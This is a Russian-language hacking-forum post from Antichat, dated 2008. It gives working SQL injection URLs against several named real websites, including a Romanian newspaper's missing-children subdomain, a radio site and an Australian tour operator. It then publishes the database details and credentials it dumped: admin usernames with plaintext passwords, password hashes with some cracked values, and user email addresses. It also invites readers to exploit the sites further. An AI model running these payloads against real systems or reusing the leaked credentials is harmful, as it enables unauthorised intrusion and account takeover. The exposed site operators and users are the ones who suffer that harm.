|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Ну что же друзья...а вот и я
http://www.gathsports.com/productsingle.php?id=1%27+UNION+SELECT+1,2,concat_ ws(0x3a,user(),version(),database()),4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
Database Version: 5.0.22
Database name: web56_db1
User name: web56_u1@localhost
в БД единственная интересная на мой взгляд таблица login с колонками username и password
там всего 2 записи
ric:letmein
sue:letmein
админку не искал...
всем спасибо
Ну а теперь предлагаю вашему вниманию сайт с ПР6, www.jurnalul.ro очень известный и популярный в Румынии журнал, на самом сайте я ничего интересного не нашел...но через суб домен... http://copiidisparuti.jurnalul.ro я обнаружил скулю и соответственно и база у них одна.Админ и редакция были мной уведомлены еще месяц назад, так как они ничего не придпренимают..выложил так сказать в паблик
http://copiidisparuti.jurnalul.ro/detalii.php?s=1&id=149+union+select+1,concat_ws(0x 3a,user(),version(),database()),3,4,5,6,7,8,9+limi t+1,1/*
Database Version: 5.0.24a
Database name: copiidisp
User name: jurnalul@localhost
В БД 2 базы но нам интересна база jurnalul_site где находится информация нужная нам..то есть админы
admins
admin_username, admin_password
admin:qZpD7%uJqdJ.
flori:nokia
claudiugamulescu:claudiu
diana:karakum
aleks:huinea
последний в записях админа скорее всего молдованин или руский который работает в редакции, так как пароль скажем так с русской спецификой.
Всем спасибо.
Пойдем дальше...
http://www.radiogaga.ro/listgalerii.php?idgalerie=1+union+select+1,2,aes_d ecrypt(aes_encrypt(concat_ws(version(),database(), user()),0x71),0x71),4,5,6,7,8,9/*
Database Version: 4.1.13a RDS Hosting Databases
Database name: radiogaga
User name: radiogaga@localhost
кроме phpbb_users не нашел ничего
user_password, username
6be414417e0001f12039083621f436cc:avitus----> Alamo97
41955c3830838c240729b92550c12dd9:Francisc Pataki
f07fa1d519bf547c76ba56b732c2cd27:Kraus Kinga
09909326d2ba3e970de66c159b05bdf6:Misi
81ef1753db31e4c85dbc18b9c751d336:OLi!
905492bc9379a5efde0923283fc82d00:gerbera51
bc9850b32b863fd80cdf7ef63c183759:gravamen_1686
b1932d548fa7208117e4d332c378c532:castigo1307
http://www.tailormadetours.com.au/emailtofriend.php?ID=-1+UNION+SELECT+concat_ws(0x3a,user(),version(),dat abase()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47,48/*
Database Version: 5.0.46
Database name: ttours
User name: ttour@203.130.164.130
вывод в поле Your Message
В БД 3 базы :
test
test_cms_database
ttours
только в первой есть таблица users ..но в ней только
userid
username
emailaddress
3:shayne:shayne@adimpact.com.au
4:mike:mike@adimpact.com.au
у кого есть желание поковырятся..милости просим.Спасибо всем.
Последний раз редактировалось Gorev; 06.07.2008 в 19:35..
|
Похожие темы
Древовидный вид